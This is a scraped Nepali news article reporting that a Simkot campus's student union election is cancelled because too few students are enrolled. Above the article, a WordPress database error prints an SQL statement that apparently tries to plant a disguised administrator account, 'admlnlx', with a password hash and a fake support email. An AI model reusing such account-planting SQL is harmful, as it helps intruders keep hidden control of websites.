WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BJXnsjlzzfhAZKaJAapl8mJYkAjIKT/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 15:42:50', '', 'admlnlx', 'admlnlx')
हुम्ला, फागुन ६ –
सिमकोटमा रहेको मानसरोवर बहुमुखी क्याम्पसमा आगामी फागुन १८ गते हुने स्वतन्त्र विद्यार्थी युनियन स्ववियुको निर्वाचन नहुने भएको छ । विद्यार्थी भर्ना संख्या न्युन रहेकोले स्ववियु चुनाव नहुने भएको हो ।
मानविकी र शिक्षाशास्त्र संकाय विषयमा अध्यापन हुँदै आएको यस क्याम्पसमा निर्वाचनका लागि आवश्यक गणपुरक संख्या नपुगेकाले निर्वाचन नहुने क्याम्पस प्रमुख बसन्त रोकायाले बताउनुभयो ।
स्नातक तहको तीनै तहमा भर्ना संख्या न्युन रहेकोले जिल्लाको एक मात्र सामुदायिक क्याम्पसमा विद्यार्थीहरुले निर्वाचनमा भाग लिन नपाउने भएका छन् । क्याम्पसमा अनेरास्ववियु, नेपाल विद्यार्थी संघ, अनेरास्ववियु(क्रान्तिकारी) गरी तीनवटा विद्यार्थी संगठन अस्तित्वमा रहेपनि उम्मेद्वार व्यक्तिको प्रस्तावक समर्थक संख्या नपुगेकोले निर्वाचन नहुने जनाइएको छ ।
अहिले क्याम्पसमा ६० जनामात्र विद्यार्थी भर्ना भएको जनाइएको छ । विद्यार्थी संख्यामा क्याम्पस स्थापनाकालदेखि कमी रहँदै आएकोले स्ववियु निर्वाचन कहिले हुने नहुने एकिन नभएको बताइएको छ ।